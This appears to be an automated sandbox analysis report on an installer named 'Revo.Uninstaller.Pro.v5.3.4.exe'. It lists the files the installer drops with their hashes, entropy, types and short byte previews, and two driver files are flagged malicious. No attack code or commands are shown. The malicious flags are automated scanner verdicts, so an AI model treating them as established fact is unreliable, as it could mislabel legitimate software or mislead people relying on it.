                                                                                                                                            SHA-256:9652F60DE7AE4AA0970578974B1886E17A0CE7B6B68BA0F3E713B34EC3636071
                                                                                                                                            SHA-512:7EFDA209EE106A26B40858040AEF9A1FC389284A1B171C9729EDBF0005E213AD536850AFCFC66083A81D724E52B50833E1E5CE2AA1CC108CAFA7E8CC9B331ED8
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$..........zT.)T.)T.).Iu)@.).Iv)}.)..(C.)..(e.)...(V.).Iw)..).Ip)G.).uC)V.)o..(..)o..(X.)o..(..).Ik)i.)T.)..)..(..).{)U.)T..)U.)..(U.)RichT.)........PE..d....IMg..........#......R...n........P........@.......................................... .....................................................0....P..........t........J..........@9..p...................H:..(....9...............p...............................text...jQ.......R.................. ..`.rdata..,~3..p....3..V..............@..@.data...x.........................@....pdata..t...........................@..@.gfids..,....`.......n..............@..@.giats.......0.......6..............@..@.tls.........@.......8..............@....rsrc........P.......:..............@..@........................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):179964
                                                                                                                                            Entropy (8bit):6.986303683816821
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:H5+pMHMfwXZawAuYNvCLBowkvWei9tL5KYps9/1Kj/9aG2l50:H5+p9wXMBgmvhctWrG
                                                                                                                                            MD5:18011FE26C01E02E939389868CB6B771
                                                                                                                                            SHA1:8FF97E84AD54A9279B908D5C66DA34736AD85541
                                                                                                                                            SHA-256:B370F4BFD94F61776FC84CF617EDB644C9ADDF4B02B0DAF14926A95D68FA7C11
                                                                                                                                            SHA-512:9051C26D30EE2B34359FF6508835508032D1434BD8596FD69ADBB73738829BCB2DA07ED03BFA10F2A07E654E43BD7C62E908372915EECAFAC6B2C585A6241829
                                                                                                                                            Malicious:false
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN.s~..PN..VH..PN.Rich.PN.........................PE..L..."D.f.................h...J...@..e6............@..........................@............@.........................................................................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x#..........................@....ndata...................................rsrc..............................@..@................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2444
                                                                                                                                            Entropy (8bit):4.986959697467434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                            MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                            SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                            SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                            SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DesusertionDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):40240
                                                                                                                                            Entropy (8bit):6.679041686686874
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:5UKM0N2alRO3gpeBJNUG+ML1naP6IXW0hzbhL7bCEMmo2ocAhu:DX+RtTL1naP6IzbhjCEDo2/Ahu
                                                                                                                                            MD5:498C3D4D44382A96812A0E0FF28D575B
                                                                                                                                            SHA1:C34586B789CA5FE4336AB23AD6FF6EEB991C9612
                                                                                                                                            SHA-256:23CB784547268CF775636B07CAC4C00B962FD10A7F9144D5D5886A9166919BBA
                                                                                                                                            SHA-512:CE450128E9CA1675EAB8AA734DC907DFC55F3DACD62503339080D6BD47B2523D063786DBE28E6833DB041F1D5869670BE2411A39C7B8D93D05A98B4C09CAD1A1
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 2%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..x...x...x...x...H..._u..}..._u..z...q.~.z...q.h.y..._u..{...q.t.{...q.i.y...q.l.y...Richx...........................PE..d...5.;K.........."......N..........................................................u...........................................................<............p.......b..0;...... ....Q...............................................P...............................text...;6.......8.................. ..h.rdata.......P.......<..............@..H.data...X....`.......B..............@....pdata.......p.......D..............@..HPAGE.................F.............. ..`INIT....v............N.............. ....rsrc................\..............@..B.reloc..z............`..............@..B........................................................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Windows setup INFormation
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2444
                                                                                                                                            Entropy (8bit):4.986959697467434
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:uNxfNNQB7y7CTOYMTf/kphtF/iifITJAld2dCOofc0MqFzA:uTfNNQB7yWO7TfMDtVpfINxCOofc32A
                                                                                                                                            MD5:5187AC55870310AFF60ED802A729A31A
                                                                                                                                            SHA1:CEA83A2959CFAC57C75DF6BD9618E71FE9F481CA
                                                                                                                                            SHA-256:084309301CA31FC8384E97B30F0867559FBD20C38772E1FF7573D24BBC1A0833
                                                                                                                                            SHA-512:70D1C28D87F223ECD93196AEB1C96591095B6A5C41ADE2CF11C08182FE872986206706F7BF2F72F44D16803DCF593249872ADD4724AF13EF7BB328A48C6CDB73
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:;;;..;;; Revoflt..;;;..;;;..;;; Copyright (c) 2009, VS Revo Group Ltd...;;;....[Version]..Signature = "$Windows NT$"..Class = "ActivityMonitor" ;This is determined by the work this filter driver does..ClassGuid = {b86dff51-a31e-4bac-b3cf-e8cfe75c9fc2} ;This value is determined by the Class..Provider = %VSRG%..DriverVer = 12/30/2009,1.0.0.4..CatalogFile = ......[DesusertionDirs]..DefaultDestDir = 12..Revoflt.DriverFiles = 12 ;%windir%\system32\drivers....;;..;; Default install sections..;;....[DefaultInstall]..OptionDesc = %ServiceDescription%..CopyFiles = Revoflt.DriverFiles....[DefaultInstall.Services]..AddService = %ServiceName%,,Revoflt.Service....;;..;; Default uninstall sections..;;....[DefaultUninstall]..DelFiles = Revoflt.DriverFiles....[DefaultUninstall.Services]..DelService = %ServiceName%,0x200 ;Ensure service is stopped before deleting....;..; Services Section..;....[Revoflt.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):38400
                                                                                                                                            Entropy (8bit):6.303083119559888
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:A1uOPkxgu01UuLjQL1nHSSdW7W0fz1Qp33u43gf:AQqk7HL1nO/Qtrgf
                                                                                                                                            MD5:EC8E58E6B58B4FCDE77431CDA3A24C0E
                                                                                                                                            SHA1:EBB474009B2A2FBCE648ADFF4B8B797FCD00C997
                                                                                                                                            SHA-256:25667717BF4691957F07A6363585E2C7EAF22E5FD7229BF32C91EA59EF4A2EDD
                                                                                                                                            SHA-512:E2C667EBE97973FF27C1EDF3E45EBF7950BC8D7AAD1126DA25290A2F590B21808654694CBE6A0AD1D3649566EC7645EB6B3379C7D7C0A650D5381A69E9CDADE4
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...................p....k...........................................Rich....................PE..d...:.._.........."......T...2.................@....................................o^....`A...................................................P....................r...$......D...hR..8............................R...............P...............................text....:.......<.................. ..h.rdata..l....P.......@..............@..H.data........`.......L..............@....pdata...............N..............@..HPAGE....G............R.............. ..`INIT.................\.............. ..bINIT....@............j..............@....rsrc................l..............@..B.reloc..D............p..............@..B........................................................................................................................................
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (606), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):111866
                                                                                                                                            Entropy (8bit):3.472213776386747
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:loS7XtdYZqA5IIsJ4FC3P7EHjz7yhYe3w67kiG2ShuJVf6:Fbtnd2m0s6
                                                                                                                                            MD5:A911C2F3BDA6270E6D66F26F41094C9F
                                                                                                                                            SHA1:EAEA65B48486E81C369AE6C5185C66A5E901511C
                                                                                                                                            SHA-256:81B0F02756D39A5772C70AD0F0A85D4091A9C53F72DC8F69FF1738B3CC05F964
                                                                                                                                            SHA-512:67455DA740703FA81CA7D042C4ECB57B19DAC985C0D39E82A4539AF5E536A20A57E6B47A1651385FFE1C36DC5D0A53D11538661E7BEBB13D719D35F52F858B29
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.E.e.s.t.i./.E.s.t.o.n.i.a.n.....W.e.b.L.a.n.g.=.E.S.T.....T.r.a.n.s.l.a.t.o.r.=.t.u.d.i.l.u.d.i. .-. .t.u.d.i.l.u.d.i...e.s.t.o.n.i.a.@.m.a.i.l...e.e.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.4...3...8.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .V.a.a.d.e.....1.0.3. .=. .S.u.v.a.n.d.i.d.....1.0.4. .=. .E.e.m.a.l.d.a.j.a.....1.0.5. .=. .T.....r.i.i.s.t.a.d.....1.0.6. .=. .J...l.i.t.a.j.a. .r.e.~.i.i.m.....1.0.7. .=. .N.i.m.e.k.i.r.i.....1.0.8. .=. .I.k.o.o.n.i.d.....1.0.9. .=. .D.e.t.a.i.l.i.d.....1.1.0. .=. .E.e.m.a.l.d.a.....1.1.1. .=. .K.u.s.t.u.t.a. .s.i.s.s.e.k.a.n.n.e.....1.1.2. .=. .V...r.s.k.e.n.d.a.....1.1.3. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.t. .s.o.o.v.i.d. .v.a.l.i.t.u.d. .s.i.s.s.e.k.a.n.d.e. .k.u.s.t.u.t.a.d.a.?.....1.1.4. .=. .O.l.e.d. .k.i.n.d.e.l.,. .e.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (601), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):107284
                                                                                                                                            Entropy (8bit):3.4850832386228205
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:LqsTLW4zJl0dBdBN86bz6M+fnZPjJPvY/:WIq
                                                                                                                                            MD5:6D908FC7ABF104D6F8D6DE6741DBD279
                                                                                                                                            SHA1:3771939E5D0F6DE53F1E07691DCB2A4AC70041F2
                                                                                                                                            SHA-256:3A99D61A738A7CF3D80581B731FF9070F31CBFB046EC9DE7CBC5C06B76EFA89D
                                                                                                                                            SHA-512:1A75B6FDB923281FF66EC33E3872F27BF3E928006D18D6C987951AE4AC02CC06DBF15CDBEF15B94152698FCB1E0DF1D85A7BE7DF73D72C9E83B23D049E182ECF
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.D.o.k.u.m.e.n.t.i. .i. .g.j.u.h.e.s. .i. .R.e.v.o. .U.n.i.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....;.T.r.a.n.s.l.a.t.e.d. .b.y. .K.l.a.u.s. .V.e.l.i.u.....;.C.o.n.t.a.c.t. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .S.h.q.i.p./.A.l.b.a.n.i.a.n.....W.e.b.L.a.n.g.=.A.L.....T.r.a.n.s.l.a.t.o.r.=.K.l.a.u.s. .V.e.l.i.u. .e.-.m.a.i.l.:. .k.l.a.u.s.v.e.l.i.u.@.h.o.t.m.a.i.l...c.o.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.3...0...8.............[...i.n.s.t.a.l.u.e.s.i. .T.o.o.l.b.a.r.].....1.0.2. .=. .P.a.m.j.a.....1.0.3. .=. .O.p.s.i.o.n.e.t.....1.0.4. .=. ...i.n.s.t.a.l.u.e.s.i.....1.0.5. .=. .M.j.e.t.e.t.....1.0.6. .=. .M.e.n.y.r.a. .e. .g.j.u.e.t.a.r.i.t.....1.0.7. .=. .M.e. .l.i.s.t.i.m.....1.0.8. .=. .M.e. .i.n.k.o.n.a.....1.0.9. .=. .M.e. .d.e.t.a.j.e.....1.1.0. .=. ...i.n.s.t.a.l.o.....1.1.1. .=. .H.i.q. .s.h.e.n.i.m.i.n.....1.1.2. .=. .R.i.f.r.e.s.k.o.....1.1.3. .=. .J.e.n.i.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (608), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):116810
                                                                                                                                            Entropy (8bit):3.9166739452051953
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:lo/tNe5HzHBOyv7EyqyYjNE7TA4s32rELViqKcc+QTMsUbpUpTk+e7WiBYMUZAj3:tqAEFycUTALVeLKSu+Y9v0OQQERYJ
                                                                                                                                            MD5:74FBABDEFEF9CEA6BE1B41CAF6941C15
                                                                                                                                            SHA1:FE53FEA79D8B382B6B4915E42FC6C0C7B0D6EBAC
                                                                                                                                            SHA-256:A42CBA216AABAAF3272FA6715D16543CDB9F9C008C3F82520DE74F2BB5BCD3A4
                                                                                                                                            SHA-512:2760A317C6BE76291D94687E3E53AD28FF748338A49DBD381BD386FF798AFFFD09301DF5D81087D744F8773C736E4B19F4397794B555CB096B585B2DF9155062
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. .9.1.(.J./.A.r.a.b.i.c.....W.e.b.L.a.n.g.=.A.R.J.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...1...7.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .9.1.6.....1.0.3. .=. ...J.'.1.'.*.....1.0.4. .=. .'.D.:.'.!. .'.D.*.+.(.J.*.....1.0.5. .=. .'.D.'./.H.'.*.....1.0.6. .=. .H.6.9. .'.D.5.J.'./.....1.0.7. .=. .B.'.&.E.).....1.0.8. .=. .'.J.B.H.F.'.*.....1.0.9. .=. .'.D.*.A.'.5.J.D.....1.1.0. .=. .'.D.:.'.!. .'.D.*.+.(.J.*.....1.1.1. .=. .'.2.'.D.). .'.D./...H.D.....1.1.2. .=. .'.F.9.'.4.....1.1.3. .=. .G.D. .'.F.*. .E.*.'.C./. .E.F. .'.F.C. .*.1.J./. .'.2.'.D.). .'.D.'./...'.D. .'.D.E.-././.......1.1.4. .=. .G.D. .'.F.*. .E.*.'.C./. .E.F. .'.F.C. .*.1.J./. .'.D.:.'.!. .*.+.(.J.*. .'.D.(.1.F.'.E.,. .'.D.E.-././.......1.1.5. .
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (315), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):52512
                                                                                                                                            Entropy (8bit):4.15365900856631
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:FoBtEKBHU2OaI3Ky4XDv8VCdzNqyqZSD57LT+:zKBH2a2Ky4T8UzNqyqZA57LT+
                                                                                                                                            MD5:7B8792AD9FED507599886F0D35F18D88
                                                                                                                                            SHA1:81B30BFC236BE7A9CC117DE9A51E2AE9D3CD0264
                                                                                                                                            SHA-256:D594C865D9406920BEBF955D60D28B687A261B52299ED39DFE9E68386BFE1C7F
                                                                                                                                            SHA-512:18FE03947DDC9669054DA659AD4AE6A4D6B2C71283376C0E63084C309CA17431899F3355E342DA28B079C771061BC29CD42AE8369B3270F2215469A880EF4DAA
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=.@.a.u.e...e.v./.A.r.m.e.n.i.a.n.....W.e.b.L.a.n.g.=.a.r.m.....T.r.a.n.s.l.a.t.o.r.=.H.r.a.n.t. .O.h.a.n.y.a.n. ....... .h.r.a.n.t.o.h.a.n.y.a.n.@.m.a.i.l...a.m.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.2...5...9.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .O.e.}...h.....1.0.3. .=. .?.a...c.a.~.x...x...t.v.e.......1.0.4. .=. .K.v.{.k.y.....1.0.5. .=. .3.x...n.k...v.e.......1.0.6. .=. .H.P.M.....1.0.7. .=. .Q.a.v.o.h.....1.0.8. .=. .J.a...o.e...v.e.......1.0.9. .=. .D.a.v...a.t.a.}.v.....1.1.0. .=. .K.v.{.e.l.....1.1.1. .=. .K.v.{.e.l. ...a.u.l.h.....1.1.2. .=. .9.a...t.a...v.e.l.....1.1.3. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c...e...h.:.....1.1.4. .=. .K.v.{.e.^.l. .h.v.....~.a.n. .n...a.c.k...h.:.....1.1.5. .=. .;.v...v.a.i.a...t.a...x...t.....1.1.6. .=. .U.c.v.x...i.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (689), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):137338
                                                                                                                                            Entropy (8bit):3.822072970240457
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:6DZ2mE0Dzcyamtkk64nvy9w+gIybiSqamOsfYFyF7F5gZOgNyspNiF:6DZ2mE0FamtmmvyNSqam1YMFU7NyspoF
                                                                                                                                            MD5:053CBEB9CABDE4426AEED59F89415AA7
                                                                                                                                            SHA1:EAE9139D7A15A35D08DB7BBD138130C661D1B651
                                                                                                                                            SHA-256:82803769AC1663397AC87CE234B0F8C4640CDF8CACEC8FBDC4C02A0ECA1305E7
                                                                                                                                            SHA-512:221579B06BE0FAF79AA9EC63E1A217E8052A87306B0FB4B9377276AFA8DD70C6585C284F2485D947B06063DB7832A89BAF174DA1C361CFAD93EFCB2100A417C8
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e. .=. .A.z.Y.r.b.a.y.c.a.n.c.a./.A.z.e.r.b.a.i.j.a.n.i.....W.e.b.L.a.n.g. .=. .A.Z.....T.r.a.n.s.l.a.t.o.r. .=. .M.a.h.i.r. .H.u.s.e.y.n.o.v. .(.u.r.o.b.o.r.o.s.1.3.0.8.7.5.@.g.m.a.i.l...c.o.m.). .....C.o.d.e.p.a.g.e. .=. .U.N.I.C.O.D.E. .....V.e.r.s.i.o.n. .=. .V.e.r.s.i.o.n.=.5...3...0.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. .G...r...n.t.......1.0.3. .=. .A.y.a.r.l.a.r.....1.0.4. .=. .P.r.o.q.r.a.m. .s.i.l.i.c.i.....1.0.5. .=. .A.l.Y.t.l.Y.r.....1.0.6. .=. .O.v...u. .r.e.j.i.m.i.....1.0.7. .=. .S.i.y.a.h.1.....1.0.8. .=. .0.k.o.n.l.a.r.....1.0.9. .=. .T.Y.f.Y.r.r...a.t.1. .i.l.Y.....1.1.0. .=. .S.i.l.....1.1.1. .=. .G.i.r.i._.i. .S.i.l.....1.1.2. .=. .Y.e.n.i.l.Y.....1.1.3. .=. .S.i.z. . .s.e...i.l.m.i._. .e.l.e.m.e.n.t.i. .s.i.l.m.Y.k. .i.s.t.Y.d.i.y.i.n.i.z.Y. .Y.m.i.n.s.i.n.i.z.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (739), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):134822
                                                                                                                                            Entropy (8bit):4.091712417960198
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:l0g0yS3dFm1917yvw3q7jcVbWcCCPH0iBTkH8NgP2Hb48m++UUaQ:t0yS3dFm6DcCNf
                                                                                                                                            MD5:8BA1BEBEA44A0ED3D19B41847BDF014F
                                                                                                                                            SHA1:BD02C23FA0D0BD122AC8E461FAAE8A2A17C223AC
                                                                                                                                            SHA-256:15E63CF0171687BA26DAFE79D9FDFEF857D737E6C1FA0E5938F35E22C3E2BC4E
                                                                                                                                            SHA-512:FEF7EBEFCBDC385C40CE3A05971A4C2E1F685C0E6D78A6282D731AC1CCC2068618A9E2E16CC5D0CAE15ED5A6AEECABB0C8B11804699BE16092BF7B4B9E52353C
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .E.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=........... ./.B.e.n.g.a.l.i.....W.e.b.L.a.n.g.=.B.N.....T.r.a.n.s.l.a.t.o.r.=.G.o.u.t.a.m. .R.o.y.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E. .....V.e.r.s.i.o.n.=.5...3...4.............[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...............1.0.3. .=. .........................1.0.4. .=. .........................1.0.5. .=. .............1.0.6. .=. ............. ...........1.0.7. .=. .................1.0.8. .=. .....................1.0.9. .=. .......................1.1.0. .=. .....................1.1.1. .=. ............... ....... .............1.1.2. .=. .............1.1.3. .=. ......... ..... ............... ..... ......... ................... ............... ........... .......?.....1.1.4. .=. ......... ..... ............... ..... ......... ................... ................... ................. ...
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (709), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):138458
                                                                                                                                            Entropy (8bit):3.886109011448417
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:qyA2Mkq69Ub7gEzBB3dm0bnx06m+O0wufPduvP4BoNpRwmwQKTlZJLTXYjABYV:ZMkczBBtm0bnx06m+O0wufVuvP4BoN3F
                                                                                                                                            MD5:3B7AF4F26FDED0678B85A50A616C7747
                                                                                                                                            SHA1:32EE9D746B29C05B9C8C11617C0051A59B0DA0FD
                                                                                                                                            SHA-256:8C2E75D77767DF1526DEE187771C97497E46BB06AA69B80A004D4746B0401B8B
                                                                                                                                            SHA-512:163ADDD03C30C53C12873B84D86B9A4D28AB39B57FC822B5F3477F6659236881DC7588BAC3D745B0E93A1248156691DA20785AF32E0EDECCD1C951A1CC5DACA1
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:..;.L.a.n.g.u.a.g.e. .f.i.l.e. .o.f. .R.e.v.o. .U.n.i.n.s.t.a.l.l.e.r. .P.r.o.....;.T.h.i.s. .s.e.c.t.i.o.n. .m.u.s.t. .u.s.e. .e.n.g.l.i.s.h.....[.I.n.f.o.].....L.a.n.g.u.a.g.e.=. ...J.;.3.0.@.A.:.8./.B.u.l.g.a.r.i.a.n. .....W.e.b.L.a.n.g.=.B.G.....T.r.a.n.s.l.a.t.o.r.=.V.S. .R.e.v.o. .G.r.o.u.p.....C.o.d.e.p.a.g.e.=.U.N.I.C.O.D.E.....V.e.r.s.i.o.n.=.5...3...4.........[.U.n.i.n.s.t.a.l.l.e.r. .T.o.o.l.b.a.r.].....1.0.2. .=. ...7.3.;.5.4.....1.0.3. .=. ...0.A.B.@.>.9.:.8.....1.0.4. .=. ...5.8.=.A.B.0.;.0.B.>.@.....1.0.5. .=. ...=.A.B.@.C.<.5.=.B.8.....1.0.6. .=. ...8.H.5.=.0.....1.0.7. .=. .!.?.8.A.J.:.....1.0.8. .=. ...:.>.=.8.....1.0.9. .=. ...5.B.0.9.;.8.....1.1.0. .=. ...5.8.=.A.B.0.;.8.@.0.9.....1.1.1. .=. ...@.5.<.0.E.=.8.....1.1.2. .=. ...?.@.5.A.=.8.....1.1.3. .=. .!.8.3.C.@.=.8. .;.8. .A.B.5.,.G.5. .8.A.:.0.B.5. .4.0. .8.7.B.@.8.5.B.5. .8.7.1.@.0.=.8.O. .5.;.5.<.5.=.B.?.....1.1.4. .=. .!.8.3.C.@.=.8. .;.8. .A.B.5.,.G.5. .8.A.:.0.B.5. .4.0. .4.5.8.=.A.B.0.;.8.@.0.B.5. .8.7.1.@.
                                                                                                                                            Process:C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exe
                                                                                                                                            File Type:Unicode text, UTF-16, little-endian text, with very long lines (659), with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):126512
                                                                                                                                            Entropy (8bit):3.720605069842754
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:1536:150RW5EH5DMXV53O2d/H+gzbtey7fvDMKd5Jpf+l9yNqaWcOIcHeG:150RW5AqXV53O2d/Hf1vDHv0ecv
                                                                                                                                            MD5:A1E4DAB88269A98C1EE4F4959E36A157
                                                                                                                                            SHA1:25F2491DE087F9C6F7D1B84E245658C19C167C91
                                                                                                                                            SHA-256:2C6EF86AF703BF0721025E58922BE5A780EC0AAC08DD479A88D467A87904D87C
                                                                                                                                            SHA-512:468508A84F689FF808A9B99BF9265D1F04FCDAEBFE798803023ED70E550835761C5A505F0BF66E78B578EA51FDECF2D2CDB4E5EAD7D7309EA3D4B01220572305
                                                                                                                                            Malicious:false
